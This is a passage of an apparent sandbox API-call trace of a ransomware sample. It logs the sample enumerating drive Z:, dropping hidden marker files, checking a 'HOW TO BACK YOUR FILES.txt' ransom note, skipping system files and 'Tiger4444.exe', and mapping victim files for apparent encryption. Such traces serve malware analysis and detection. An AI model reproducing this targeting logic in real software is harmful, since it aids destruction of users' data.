ListHead=0xc66808) returned 0xc666c8 [0051.509] lstrcpynW (in: lpString1=0x2aaed98, lpString2="C:\\Windows10Upgrade\\resources\\i386", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\resources\\i386") returned="C:\\Windows10Upgrade\\resources\\i386" [0051.509] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7b1e8 | out: hHeap=0xc50000) returned 1 [0051.509] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc666c0 | out: hHeap=0xc50000) returned 1 [0051.509] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x20) returned 0xc6f5d8 [0051.509] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc5a720 [0051.509] RtlInitializeSListHead (in: ListHead=0xc5a728 | out: ListHead=0xc5a728) [0051.509] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc666c0 [0051.509] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x46) returned 0xc7b558 [0051.509] RtlInterlockedPushEntrySList (in: ListHead=0xc5a728, ListEntry=0xc666c8 | out: ListHead=0xc5a728, ListEntry=0xc666c8) returned 0x0 [0051.509] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1f500, lpParameter=0xc6f5d8, dwCreationFlags=0x0, lpThreadId=0xc6f5e0 | out: lpThreadId=0xc6f5e0*=0x9e0) returned 0x2cc [0051.509] WaitForMultipleObjects (nCount=0x2, lpHandles=0xc707a4*=0x264, bWaitAll=0, dwMilliseconds=0x2710) returned 0x1 [0053.085] CloseHandle (hObject=0x2cc) returned 1 [0053.085] RtlInterlockedPopEntrySList (in: ListHead=0xc66808 | out: ListHead=0xc66808) returned 0xc66348 [0053.085] lstrcpynW (in: lpString1=0x2aaed98, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-widevinecdm\\1.4.8.903" [0053.085] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8db20 | out: hHeap=0xc50000) returned 1 [0053.085] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66340 | out: hHeap=0xc50000) returned 1 [0053.085] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x20) returned 0xc6f830 [0053.085] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66620 [0053.085] RtlInitializeSListHead (in: ListHead=0xc66628 | out: ListHead=0xc66628) [0053.085] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66320 [0053.085] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc8) returned 0xc8d570 [0053.085] RtlInterlockedPushEntrySList (in: ListHead=0xc66628, ListEntry=0xc66328 | out: ListHead=0xc66628, ListEntry=0xc66328) returned 0x0 [0053.085] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1f500, lpParameter=0xc6f830, dwCreationFlags=0x0, lpThreadId=0xc6f838 | out: lpThreadId=0xc6f838*=0xc04) returned 0x2cc [0053.085] WaitForMultipleObjects (nCount=0x2, lpHandles=0xc707a4*=0x264, bWaitAll=0, dwMilliseconds=0x2710) returned 0x1 [0053.320] CloseHandle (hObject=0x2cc) returned 1 [0053.320] RtlInterlockedPopEntrySList (in: ListHead=0xc66808 | out: ListHead=0xc66808) returned 0x0 [0053.320] WaitForMultipleObjects (nCount=0x1, lpHandles=0xc707a4*=0x264, bWaitAll=0, dwMilliseconds=0x2710) Thread: id = 11 os_tid = 0xdcc [0037.908] RtlInterlockedPopEntrySList (in: ListHead=0xc66848 | out: ListHead=0xc66848) returned 0xc66508 [0037.908] lstrcpynW (in: lpString1=0x2faeb00, lpString2="Z:", iMaxLength=2048 | out: lpString1="Z:") returned="Z:" [0037.908] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0037.908] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66500 | out: hHeap=0xc50000) returned 1 [0037.908] lstrcatW (in: lpString1="", lpString2="Z:" | out: lpString1="Z:") returned="Z:" [0037.908] lstrcatW (in: lpString1="Z:", lpString2="\\" | out: lpString1="Z:\\") returned="Z:\\" [0037.908] lstrcatW (in: lpString1="Z:\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="Z:\\.BFC0E91B00AE8A0620D3") returned="Z:\\.BFC0E91B00AE8A0620D3" [0037.912] CreateFileW (lpFileName="Z:\\.BFC0E91B00AE8A0620D3" (normalized: "z:\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0037.934] WriteFile (in: hFile=0x27c, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x2facac0, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x2facac0*=0x3d4, lpOverlapped=0x0) returned 1 [0037.936] FlushFileBuffers (hFile=0x27c) returned 1 [0037.942] SetFileAttributesW (lpFileName="Z:\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0037.943] CloseHandle (hObject=0x27c) returned 1 [0037.943] lstrlenW (lpString="Z:") returned 2 [0037.943] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0037.943] FindFirstFileW (in: lpFileName="Z:\\*", lpFindFileData=0x2fadfb0 | out: lpFindFileData=0x2fadfb0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7ba0eda4, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7ba0eda4, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7ba0eda4, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="")) returned 0xc72cc8 [0037.943] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0037.943] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0037.943] FindNextFileW (in: hFindFile=0xc72cc8, lpFindFileData=0x2fadfb0 | out: lpFindFileData=0x2fadfb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x21f97274, ftLastAccessTime.dwHighDateTime=0x1d32795, ftLastWriteTime.dwLowDateTime=0x21f97274, ftLastWriteTime.dwHighDateTime=0x1d32795, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0037.943] lstrcmpiW (lpString1="Recovery", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0037.943] lstrcmpiW (lpString1="Recovery", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0037.943] lstrcmpiW (lpString1="Recovery", lpString2="Tiger4444.exe") returned -1 [0037.943] lstrcmpiW (lpString1="Recovery", lpString2=".") returned 1 [0037.943] lstrcmpiW (lpString1="Recovery", lpString2="..") returned 1 [0037.943] lstrcmpiW (lpString1="Recovery", lpString2="windows") returned -1 [0037.943] lstrcmpiW (lpString1="Recovery", lpString2="bootmgr") returned 1 [0037.943] lstrcmpiW (lpString1="Recovery", lpString2="pagefile.sys") returned 1 [0037.943] lstrcmpiW (lpString1="Recovery", lpString2="boot") returned 1 [0037.943] lstrcmpiW (lpString1="Recovery", lpString2="ids.txt") returned 1 [0037.943] lstrcmpiW (lpString1="Recovery", lpString2="NTUSER.DAT") returned 1 [0037.944] lstrcpyW (in: lpString1=0x2faeb06, lpString2="Recovery" | out: lpString1="Recovery") returned="Recovery" [0037.944] SetFileAttributesW (lpFileName="Z:\\Recovery", dwFileAttributes=0x2012) returned 1 [0037.944] lstrcatW (in: lpString1="", lpString2="Z:\\Recovery" | out: lpString1="Z:\\Recovery") returned="Z:\\Recovery" [0037.944] lstrcatW (in: lpString1="Z:\\Recovery", lpString2="\\" | out: lpString1="Z:\\Recovery\\") returned="Z:\\Recovery\\" [0037.944] lstrcatW (in: lpString1="Z:\\Recovery\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="Z:\\Recovery\\.BFC0E91B00AE8A0620D3") returned="Z:\\Recovery\\.BFC0E91B00AE8A0620D3" [0037.944] CreateFileW (lpFileName="Z:\\Recovery\\.BFC0E91B00AE8A0620D3" (normalized: "z:\\recovery\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0037.945] WriteFile (in: hFile=0x280, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x2facac0, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x2facac0*=0x3d4, lpOverlapped=0x0) returned 1 [0037.947] FlushFileBuffers (hFile=0x280) returned 1 [0037.948] SetFileAttributesW (lpFileName="Z:\\Recovery\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0037.948] CloseHandle (hObject=0x280) returned 1 [0037.948] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66500 [0037.948] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x18) returned 0xc663c0 [0037.948] RtlInterlockedPushEntrySList (in: ListHead=0xc66808, ListEntry=0xc66508 | out: ListHead=0xc66808, ListEntry=0xc66508) returned 0x0 [0037.948] FindNextFileW (in: hFindFile=0xc72cc8, lpFindFileData=0x2fadfb0 | out: lpFindFileData=0x2fadfb0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x8983e192, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x899e1d51, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x899e1d51, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="")) returned 1 [0037.948] lstrcmpiW (lpString1="System Volume Information", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0037.948] lstrcmpiW (lpString1="System Volume Information", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0037.948] lstrcmpiW (lpString1="System Volume Information", lpString2="Tiger4444.exe") returned -1 [0037.948] lstrcmpiW (lpString1="System Volume Information", lpString2=".") returned 1 [0037.948] lstrcmpiW (lpString1="System Volume Information", lpString2="..") returned 1 [0037.948] lstrcmpiW (lpString1="System Volume Information", lpString2="windows") returned -1 [0037.948] lstrcmpiW (lpString1="System Volume Information", lpString2="bootmgr") returned 1 [0037.948] lstrcmpiW (lpString1="System Volume Information", lpString2="pagefile.sys") returned 1 [0037.948] lstrcmpiW (lpString1="System Volume Information", lpString2="boot") returned 1 [0037.948] lstrcmpiW (lpString1="System Volume Information", lpString2="ids.txt") returned 1 [0037.948] lstrcmpiW (lpString1="System Volume Information", lpString2="NTUSER.DAT") returned 1 [0037.948] lstrcpyW (in: lpString1=0x2faeb06, lpString2="System Volume Information" | out: lpString1="System Volume Information") returned="System Volume Information" [0037.948] SetFileAttributesW (lpFileName="Z:\\System Volume Information", dwFileAttributes=0x12) returned 1 [0037.949] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc663e0 [0037.949] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x3a) returned 0xc83df8 [0037.949] RtlInterlockedPushEntrySList (in: ListHead=0xc66848, ListEntry=0xc663e8 | out: ListHead=0xc66848, ListEntry=0xc663e8) returned 0x0 [0037.949] FindNextFileW (in: hFindFile=0xc72cc8, lpFindFileData=0x2fadfb0 | out: lpFindFileData=0x2fadfb0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x8983e192, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x899e1d51, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x899e1d51, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="")) returned 0 [0037.949] FindClose (in: hFindFile=0xc72cc8 | out: hFindFile=0xc72cc8) returned 1 [0037.949] lstrcpyW (in: lpString1=0x2faeb06, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0037.949] CreateFileW (lpFileName="Z:\\HOW TO BACK YOUR FILES.txt" (normalized: "z:\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0037.949] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0037.949] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xc20000 [0037.950] UnmapViewOfFile (lpBaseAddress=0xc20000) returned 1 [0037.950] CloseHandle (hObject=0x280) returned 1 [0037.950] CloseHandle (hObject=0x27c) returned 1 [0037.950] GetCurrentThreadId () returned 0xdcc [0037.950] RtlInterlockedPopEntrySList (in: ListHead=0xc66848 | out: ListHead=0xc66848) returned 0xc663e8 [0037.950] lstrcpynW (in: lpString1=0x2faeb00, lpString2="Z:\\System Volume Information", iMaxLength=2048 | out: lpString1="Z:\\System Volume Information") returned="Z:\\System Volume Information" [0037.950] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc83df8 | out: hHeap=0xc50000) returned 1 [0037.950] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc663e0 | out: hHeap=0xc50000) returned 1 [0037.950] lstrcatW (in: lpString1="", lpString2="Z:\\System Volume Information" | out: lpString1="Z:\\System Volume Information") returned="Z:\\System Volume Information" [0037.950] lstrcatW (in: lpString1="Z:\\System Volume Information", lpString2="\\" | out: lpString1="Z:\\System Volume Information\\") returned="Z:\\System Volume Information\\" [0037.950] lstrcatW (in: lpString1="Z:\\System Volume Information\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="Z:\\System Volume Information\\.BFC0E91B00AE8A0620D3") returned="Z:\\System Volume Information\\.BFC0E91B00AE8A0620D3" [0037.950] CreateFileW (lpFileName="Z:\\System Volume Information\\.BFC0E91B00AE8A0620D3" (normalized: "z:\\system volume information\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0037.951] WriteFile (in: hFile=0x27c, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x2facac0, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x2facac0*=0x3d4, lpOverlapped=0x0) returned 1 [0037.953] FlushFileBuffers (hFile=0x27c) returned 1 [0037.954] SetFileAttributesW (lpFileName="Z:\\System Volume Information\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0037.954] CloseHandle (hObject=0x27c) returned 1 [0037.954] lstrlenW (lpString="Z:\\System Volume Information") returned 28 [0037.954] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0037.954] FindFirstFileW (in: lpFileName="Z:\\System Volume Information\\*", lpFindFileData=0x2fadfb0 | out: lpFindFileData=0x2fadfb0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x8983e192, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x899e1d51, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x7ba35036, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72ec8 [0037.954] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0037.954] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0037.954] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0037.954] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0037.954] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x2fadfb0 | out: lpFindFileData=0x2fadfb0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x8983e192, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x899e1d51, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x7ba35036, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0037.954] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0037.954] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0037.954] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0037.954] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0037.954] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0037.954] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x2fadfb0 | out: lpFindFileData=0x2fadfb0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7ba35036, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7ba35036, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7ba35036, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="")) returned 1 [0037.954] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0037.954] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0037.954] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x2fadfb0 | out: lpFindFileData=0x2fadfb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8983e192, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8983e192, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x899e1d51, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tracking.log", cAlternateFileName="")) returned 1 [0037.954] lstrcmpiW (lpString1="tracking.log", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0037.954] lstrcmpiW (lpString1="tracking.log", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0037.955] lstrcmpiW (lpString1="tracking.log", lpString2="Tiger4444.exe") returned 1 [0037.955] lstrcmpiW (lpString1="tracking.log", lpString2=".") returned 1 [0037.955] lstrcmpiW (lpString1="tracking.log", lpString2="..") returned 1 [0037.955] lstrcmpiW (lpString1="tracking.log", lpString2="windows") returned -1 [0037.955] lstrcmpiW (lpString1="tracking.log", lpString2="bootmgr") returned 1 [0037.955] lstrcmpiW (lpString1="tracking.log", lpString2="pagefile.sys") returned 1 [0037.955] lstrcmpiW (lpString1="tracking.log", lpString2="boot") returned 1 [0037.955] lstrcmpiW (lpString1="tracking.log", lpString2="ids.txt") returned 1 [0037.955] lstrcmpiW (lpString1="tracking.log", lpString2="NTUSER.DAT") returned 1 [0037.955] lstrcpyW (in: lpString1=0x2faeb3a, lpString2="tracking.log" | out: lpString1="tracking.log") returned="tracking.log" [0037.955] SetFileAttributesW (lpFileName="Z:\\System Volume Information\\tracking.log", dwFileAttributes=0x22) returned 1 [0037.955] SetFileAttributesW (lpFileName="Z:\\System Volume Information\\tracking.log", dwFileAttributes=0x6) returned 1 [0037.955] lstrlenW (lpString="tracking.log") returned 12 [0037.955] lstrlenW (lpString="Tiger4444") returned 9 [0037.955] lstrcmpiW (lpString1="cking.log", lpString2="Tiger4444") returned -1 [0037.955] lstrlenW (lpString=".dll") returned 4 [0037.955] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0037.955] lstrlenW (lpString=".lnk") returned 4 [0037.955] lstrcmpiW (lpString1=".log", lpString2=".lnk") returned 1 [0037.955] lstrlenW (lpString=".ini") returned 4 [0037.955] lstrcmpiW (lpString1=".log", lpString2=".ini") returned 1 [0037.955] lstrlenW (lpString=".sys") returned 4 [0037.955] lstrcmpiW (lpString1=".log", lpString2=".sys") returned -1 [0037.956] CreateFileW (lpFileName="Z:\\System Volume Information\\tracking.log" (normalized: "z:\\system volume information\\tracking.log"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0037.956] QueryPerformanceFrequency (in: lpFrequency=0x2fabf80 | out: lpFrequency=0x2fabf80*=100000000) returned 1 [0037.956] QueryPerformanceCounter (in: lpPerformanceCount=0x2fabf88 | out: lpPerformanceCount=0x2fabf88*=12940877670) returned 1 [0037.956] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x2fabfe0 | out: lpFileSize=0x2fabfe0*=20480) returned 1 [0037.956] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc60fe8 [0037.956] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71bf8 [0037.956] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5300, lpName=0x0) returned 0x284 [0037.956] MapViewOfFile (hFileMappingObject=0x284, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5300) returned 0xc20000 [0037.962] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc56ed0 [0037.962] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0037.962] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc56ed0 | out: hHeap=0xc50000) returned 1 [0037.962] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0037.962] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0037.962] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x4) returned 0xc75238 [0037.962] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x204) returned 0xc84170 [0037.962] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75238 | out: hHeap=0xc50000) returned 1 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x204) returned 0xc84380 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc56ed0 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x20c) returned 0xc84590 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73c18 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0037.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc56ed0 | out: hHeap=0xc50000) returned 1 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x204) returned 0xc847a8 [0037.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753f8 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73ca8 [0037.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0037.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753f8 | out: hHeap=0xc50000) returned 1 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0037.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0037.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x108) returned 0xc76328 [0037.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73ca8 | out: hHeap=0xc50000) returned 1 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x204) returned 0xc849b8 [0037.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0037.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0037.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0037.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75378 [0037.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75378 | out: hHeap=0xc50000) returned 1 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0037.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0037.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752d8 [0037.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752d8 | out: hHeap=0xc50000) returned 1 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0037.963] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0037.963] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0037.964] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0037.964] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75388 [0037.964] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75388 | out: hHeap=0xc50000) returned 1 [0037.964] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752d8 [0037.964] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752d8 | out: hHeap=0xc50000) returned 1 [0037.964] RtlAllocateHeap (HeapHandle=0xc50000, 